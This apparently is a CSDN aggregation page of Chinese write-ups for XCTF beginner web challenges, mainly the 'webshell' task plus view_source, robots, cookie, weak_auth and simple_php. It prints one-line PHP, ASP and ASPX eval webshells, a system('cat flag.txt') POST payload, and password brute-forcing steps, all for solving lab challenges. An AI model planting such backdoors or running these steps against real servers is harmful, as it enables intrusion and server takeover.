web webshell 攻防世界_攻防世界web新手webshell - CSDN
精华内容
参与话题
  • XCTF攻防世界web新手练习_ 8_webshell

    千次阅读 2019-05-05 12:35:27
    XCTF攻防世界web新手练习—webshell 题目 题目为webshell,描述中,重点:把它放在了index.php里 打开题目,你会使用webshell吗?并写出了一句话,从中很容易看出这个一句话的密码是" shell " 顺理成章,打开菜刀...

    XCTF攻防世界web新手练习—webshell

    题目

    题目为webshell,描述中,重点:把它放在了index.php里
    在这里插入图片描述
    打开题目,你会使用webshell吗?并写出了一句话,从中很容易看出这个一句话的密码是" shell "
    在这里插入图片描述
    顺理成章,打开菜刀,添加,输入url,输如密码,连接成功,
    一气呵成!
    在这里插入图片描述
    菜刀连接成功后可以直接对服务器文件进行操作,看到flag.txt,打开获得flag!
    在这里插入图片描述

    关于webshell与一句话木马

    webshell

    维基百科:

    webshell(分类为远程访问木马)是作为一个基于网络的实现的网络安全威胁shell概念。 Webshell可以上传到Web服务器,以
    允许远程访问Web服务器
    ,例如Web服务器的文件系统。
    Webshell的独特之处在于它使用户能够通过充当命令行界面的Web浏览器访问Web服务器。用户可以使用Web浏览器通过万维网访问远程计算机在任何类型的系统上,无论是台式计算机还是带有Web浏览器的手机,都可以在远程系统上执行任务。主机或客户端都不需要命令行环境。

    简单的说webshell就是web后门,比如php,asp木马后门。黑客在入侵了一个网站后,常常在将这些 asp或php木马后门文件放置在网站服务器的web目录中,与正常的网页文件混在一起。然后就可以用web的方式,通过asp或php木马后门控制网站服务器,包括上传下载文件、查看数据库、执行任意程序命令等。

    Web shell通过Web应用程序中的漏洞或弱服务器安全配置上传,包括以下内容:

    • 1. SQL注入 ;
    • 2. 应用程序和服务中的漏洞(例如NGINX等Web服务器软件或WordPress等内容管理系统应用程序);
    • 3. 文件处理和上传漏洞(例如限制可上传的文件类型);
    • 4. 远程文件包含(RFI)和本地文件包含(LFI)漏洞;
    • 5. 远程代码执行 ;
    • 6. 暴露的管理界面;
    • 7. 跨站脚本

    一句话木马

    简单来说一句话木马就是通过向服务端提交一句简短的代码来达到向服务器插入木马并最终获得webshell的方法。

    一些不同脚本语言的一句话木马

    php一句话木马:  <?php @eval($_POST[value]); ?>
    asp一句话木马:  <%eval request ("value")%> 
                  或  <% execute(request("value")) %>   
    aspx一句话木马: <%@ Page Language="Jscript" %> <% eval(Request.Item["value"]) %>
    

    参考:https://blog.csdn.net/qq_36119192/article/details/84563791

    https://fly8wo.github.io/2018/08/17/%E4%B8%AD%E5%9B%BD%E8%8F%9C%E5%88%80%E4%B9%8B%E5%86%99%E4%B8%80%E5%8F%A5%E8%AF%9D%E6%9C%A8%E9%A9%AC%E5%8F%98%E5%BD%A2/

    展开全文
  • 攻防世界webshell

    千次阅读 2020-01-23 11:22:57
    这一题主要是关于一句话木马的使用与工具的使用。本题不难,针对像我一样的新手用来了解其中内涵吧。 题目描述:小宁百度了php一句话,觉着很有意思,并且把它放在index.php里 打开页面,出现一句话木马 ... ... ......

    这一题主要是关于一句话木马的使用与工具的使用。本题不难,针对像我一样的新手用来了解其中内涵吧。

    题目描述:小宁百度了php一句话,觉着很有意思,并且把它放在index.php里

    打开页面,出现一句话木马
    在这里插入图片描述

    使用蚁剑进行操作,一句话木马中给出密码是shell,进行添加
    在这里插入图片描述
    点击进入添加的地址:
    在这里插入图片描述
    拿到flag
    在这里插入图片描述

    展开全文
  • 001 view_source

    目录

    001 view_source

    题目:
    在这里插入图片描述
    分析过程:鼠标右键不能用无法使用查看元素,因此使用指令。查看网页源代码,使用view-source指令(firefox浏览器运行),即可得其flag在第17行。除去注解,flag为 cyberpeace{8976bc2e435a178076e14a858b8362be}

    在这里插入图片描述查看源码方法小结
    第一种:火狐浏览器可直接访问地址后单击右键查看元素。

    第二种:view-source指令
      view-source是一种协议,早期基本上每个浏览器都支持这个协议。但是不知道什么原因,从IE6 Beta2以后IE就不再支持此协议了。这个方法现在只能用在FireFox浏览器上使用了!
      使用方法:在浏览器地址栏中输入view-source:地址
      回车即可看到网页的源代码了。

    第三种:JavaScript法
      这种方法似乎也不是通用的,在IE6和Opere浏览器上试验成功,但是在FireFox浏览器上就没成功!
      使用方法:在浏览器地址栏中输入 javascript: s=document.documentElement.outerHTML;document.write("");document.body.innerText=s;
      回车即可看到网页的源代码。

    第三种方法:通过vbscript方法
    代码如下:
    iLocal=“get.htm.txt”
    iRemote=inputbox(“请输入你要获取源码的地址”,“脚本之家”,"//www.jb51.net")
    if iRemote="" then iRemote=“http://www.baidu.com”
    Set xPost=createObject(“Microsoft.XMLHTTP”)
    xPost.Open “GET”,iRemote,0
    xPost.Send()
    set sGet=createObject(“ADODB.Stream”)
    sGet.Mode=3
    sGet.Type=1
    sGet.Open()
    sGet.Write xPost.ResponseBody
    sGet.SaveToFile iLocal,2

    第四种方法:通过后台语言asp,php等

    002 get post

    get post参考资料
    https://www.w3school.com.cn/tags/html_ref_httpmethods.asp

    题目:
    在这里插入图片描述步骤1.访问该网址
    在这里插入图片描述2.根据提示
    不行,加个?
    3.选中post data,输入值b=2即可得flag为:
    cyberpeace{f3191549177bbcc66490a192693cd20e}

    在这里插入图片描述

    003robots

    参考资料
    https://baike.baidu.com/item/Robots%E5%8D%8F%E8%AE%AE
    题目
    在这里插入图片描述
    robots:搜索引擎通过一种程序robot(又称spider),自动访问互联网上的网页并获取网页信息。您可以在您的网站中创建一个纯文本文件robots.txt,在这个文件中声明该网站中不想被robot访问的部分,这样,该网站的部分或全部内容就可以不被搜索引擎收录了,或者指定搜索引擎只收录指定的内容。该文件默认在网站根目录下。

    因此直接访问该地址下的robots.txt文件看到flag文件后,访问该文件即可。

    步骤:
    在这里插入图片描述
    在这里插入图片描述

    004backup

    web漏洞之备份文件
    题目:
    在这里插入图片描述
    步骤:
    在这里插入图片描述index.php的备份文件名是index.php.bak,访问即可。
    在这里插入图片描述在这里插入图片描述

    005cookie

    在这里插入图片描述火狐cookie和hackbar插件即可,前者查看cookie存放地点,后者访问后查看其http头
    在这里插入图片描述在这里插入图片描述在这里插入图片描述

    006disable button


    在这里插入图片描述在这里插入图片描述将将按钮button的默认值disable删掉或改为able
    在这里插入图片描述

    007simple js

    在这里插入图片描述
    simple_js
    [原理]
    javascript的代码审计
    [步骤]
    1.打开页面,查看源代码,可以发现js代码,如图所示。
    在这里插入图片描述2.进行代码审计,发现不论输入什么都会跳到假密码,真密码位于 fromCharCode 。

    3.将JS代码复制出来进行分析,看到%35%35%2c%35%36%2c%35%34%2c%37%39%2c%31%31%35%2c%36%39%2c%31%31%34%2c%31%31%36%2c%31%30%37%2c%34%39%2c%35%30,\x转换为%,将字符串转换为URL编码。
    在这里插入图片描述在这里插入图片描述
    4.将得到的数字分别进行ascii处理,可得到字符串786OsErtk12。
    5.规范flag格式,可得到Cyberpeace{786OsErtk12}

    008xff_referer

    xff_referer
    [原理]
    X-Forwarded-For:简称XFF头,它代表客户端,也就是HTTP的请求端真实的IP,只有在通过了HTTP 代理或者负载均衡服务器时才会添加该项。
    HTTP Referer是header的一部分,当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服务器我是从哪个页面链接过来的。
    [目的]
    掌握有关X-Forwarded-For和Referer的知识

    [工具]
    firefox、burpsuite
    [步骤]
    1.打开firefox。按照提示将ip修改为123.123.123.123
    在这里插入图片描述

    2.在请求头最后添加Referer: https://www.google.com,可获得flag在这里插入图片描述

    009weak_auth

    在这里插入图片描述
    了解弱口令,掌握爆破方法
    [环境]

    windows
    [工具]
    burpsuite
    字典https://github.com/rootphantomer/Blasting_dictionary/blob/master/常用密码.txt

    [步骤]
    1.随便输入下用户名和密码,提示要用admin用户登入,然后跳转到了check.php,查看下源代码提示要用字典。
    2.用burpsuite截下登录的数据包,把数据包发送到intruder爆破
    在这里插入图片描述
    2.设置爆破点为password
    在这里插入图片描述
    3.加载字典
    在这里插入图片描述4.开始攻击,查看响应包列表,发现密码为123456时,响应包的长度和别的不一样.
    在这里插入图片描述

    5.点进去查看响应包,获得flag
    在这里插入图片描述

    010webshell

    [目标]
    了解php一句话木马、如何使用webshell

    [工具]
    firefox、hackbar
    蚁剑下载地址https://github.com/AntSwordProject/antSword/releases(https://github.com/AntSwordProject/antSword/releases)
    或者使用中国菜刀
    [步骤]
    1.直接提示给了php一句话,可以用菜刀或蚁剑连接,此处用蚁剑链接:
    在这里插入图片描述2.连接后在网站目录下发现了flag.txt文件,查看文件可获得flag
    在这里插入图片描述

    3.也可以使用hackbar,使用post方式传递shell=system(‘cat flag.txt’); 获得flag
    在这里插入图片描述

    011simple_php

    小宁听说php是最好的语言,于是她简单学习之后写了几行php代码。
    在这里插入图片描述
    简单审计下代码,发现需要以get的方式传入两个参数a和b。
    阅读代码发现需要同时满足a==0且if a为真,b不是数字且b>1234才会返回flag.则由上诉结论可以得出url可为?a=0a&b=12345a

    关于a和b的取值问题如下解释php手册里面写道:当一个字符串当作一个数值来取值,其结果和类型如下:如果该字符串没有包含’.’,’e’,’E’并且其数值值在整形的范围之内,该字符串被当作int来取值,其他所有情况下都被作为float来取值,该字符串的开始部分决定了它的值,如果该字符串以合法的数值开始,则使用该数值,否则其值为0如:“0e11”=="0e22"比较的时候,会将这类字符串识别为科学技术法的数字,所以0的多少次方都是零。“A”==0比较的时候,会将A转化成数值,强制转化,由于A是字符串,转化的结果是0自然和0相等。“1A”==1比较的时候会将1A转化成为数值1;但“A1“==1结果却为false,也就是"A1"转化成了0

    解法2:
    a参数的要求 a必须等于0且a为真
    b参数的要求 b不能为数字且b大于1234

    这道题的核心问题是理解PHP语言的弱类型,具体文章请参考:https://www.cnblogs.com/Mrsm1th/p/6745532.html

    在这里插入图片描述

    展开全文
  • 攻防世界 web webshell

    2020-03-01 13:29:48
    做题两分钟,工具两小时 题目描述:小宁百度了php一句话,觉着很有意思,并且把它放在index.php里。 所谓的php一句话:<?php @eval($_POST['shell...?...这题又涉及到新的web工具,Cknife (因为现在网络上菜刀的后...

    做题两分钟,工具两小时

    题目描述:小宁百度了php一句话,觉着很有意思,并且把它放在index.php里。

    所谓的php一句话:<?php @eval($_POST['shell']);?>
    这个是PHP最常见的一句话木马的源码,通过post木马程序来实现木马的植入,eval()函数把字符串按照PHP代码来计算

    这题又涉及到新的web工具,Cknife (因为现在网络上菜刀的后门太多了,所以不推荐菜刀了)
    这次我用的是antsword,antsword的github链接
    这题时间主要花在了解题工具上面,做题倒是很快。

    1.右键添加数据
    在这里插入图片描述
    2.把url和连接密码输进去
    因为这题提示是webshell,所以推测密码是shell,一开始我把那个一句话php放进去发现不对…
    在这里插入图片描述
    3.找到flag.txt
    在这里插入图片描述
    cyberpeace{17b8c20c87ed744736dca537ddea2777}

    展开全文
  • 攻防世界Web新手题总结

    千次阅读 2019-09-28 16:57:42
    这一周我一直在攻防世界上做web新手题,今天刚刚做完,特意写篇博客来做一下总结。下面就开始写我的解题过程。 先把所有题目贴出来 Web新手题一共有12道题,分别是 view_source get_post robots backup cookie ...
  • WebShell的检测技术

    千次阅读 2013-09-22 11:52:44
    一、Webshell 的常见植入方法   -启明星辰 Leylo Trent WebShell 攻击是常见的用来控制Web 服务器的攻击方法,WebShell 文件通常是可执行的脚本文件,例如asp, php, jsp 文件,有些辤可利用web 服务器...
  • 我的web渗透学习心得(一)

    千次阅读 2018-05-01 14:11:12
    这次分享一些自己学web渗透的一些心得吧(仅作个人心得,谨慎参照,有大佬路过还望指点一下~).此前一直在学Java web.这次趁着五一假期好好钻研了下web渗透.其实我一直觉得每个学计算机的人都有黑客梦,炫酷吊炸天啊........
  • 从aspx到webshell肉鸡

    千次阅读 2014-05-15 10:19:17
    笔者一直都在强调一个东西,在网络攻防中最重要的就是思维。本文的灵感来自于安天365团队的一个篇稿件,在稿件中提到了一个AspxSpy的Asp.net类型后门软件,在安全界中最近一直流行后门中的后门,即通过给出一个包含...
  • AWD攻防漏洞分析——文件上传

    千次阅读 2020-03-08 13:07:52
    本文主要讲述了AWD(Attack With Defence)攻防下的文件上传的一些思路,希望能对您有所帮助。
  • 攻防世界-Web(新手区)

    千次阅读 2020-07-02 19:46:04
    暑假前,为了学习Web题,做了攻防世界的新手区的Web题,当时没有总结,现在总结一下。 正文 Web1:view_source 查看源代码,右键不可以用。所以按F12,直接查看源码即可。 Web2:get_post HTTP的两种请求方式 GET...
  • 题目 解题 1.进入看到显示 然后我们可以得到这个一句话的密码是shell 2.使用蚁剑 1)右键单击空白处添加数据 2)输入地址和密码连接 连接成功 看到FLAG,打开flag.txt 得到FLAG ...
  • 说说AWD攻防赛流程以及准备经验

    千次阅读 2019-04-16 16:40:42
    在上一篇文章中,我们说到了一个非常有意思的模式: AWD (Attack With Defense,攻防兼备)模式。你需要在一场比赛里要扮演攻击方和防守方,攻者得分,失守者会被扣分。也就是说,攻击别人的靶机可以获取 Flag 分数时...
  • webshell攻与防

    千次阅读 2020-07-25 11:43:44
    最近几个月中,参加过很多webshell检测的比赛,有我们内部的,也有其他厂商的,...了一套自己的方法论,本篇内容会给出我的思考方式,包括针对webshell文件 多种检测手段的攻防总结,而不会直接给- -个通用的web
  • 我的网络攻防小结,附攻击实例(随笔)
  • 基于行为分析来发现"未知的Webshell

    千次阅读 2015-11-23 09:16:39
    一、 “已知”or “未知” 已知的已知,已知的未知,未知的未知,这个最近安全行业也谈的比较多,目前圈内热炒的“威胁情报”,其实应该属于“已知的未知”,对本地来说是未知威胁,其实是别的地方已经发生过的...
  • 攻防世界web

    万次阅读 2019-05-23 20:44:04
    攻防世界web 前言 准备ctf比赛,这里把攻防世界分值低于5分的基本刷了一遍(分值再高刷不动了…) 练习 view_source 没难度知识禁用了右键点击,ctrl+u查看源码拿到flag get_post 这题没什么好说的,按着提示来...
  • 转自:http://www.zbeol.com/blog/post/1856.html !@#123 ******* 000 1 10011C120105101 111 12 123 123!@# 123321 12345 123456 123654 123654789 123654789! 123654789. ...133
  • AWD攻防模式

    千次阅读 2019-05-13 15:35:50
    看了很多篇文章,要注意的事情太多了,只打过很不正规的小型awd,不算真正的awd,感觉真正的awd要被打爆哈哈,慢慢来吧。先写个大致框架。...8.webshell,维权 9.不死马杀进程,重启服务器 10....
  • Tomcat Manager 用户名和密码配置

    万次阅读 2010-01-05 16:52:00
    本文内容为作者对“利用Tomcat的用户名和密码构建永久后门“的一些选摘,原文链接在此:http://simeon.blog.51cto.com/18680/58877在Tomcat中,...在浏览器中访问这个应用的Jsp时,通常第一次会很慢,因为Tomcat要将Jsp
  • Metasploit之生成webshell及应用   准备工具 1、kali 系统 IP 10.10.10.131 2、受害者机子 IP 10.10.10.130 3、使用工具 Metasploit   步骤:   1、在msf生成asp脚本木马 root@kali:~# msfvenom...
1 2 3 4 5 ... 20
收藏数 977
精华内容 390
关键字:

web webshell 攻防世界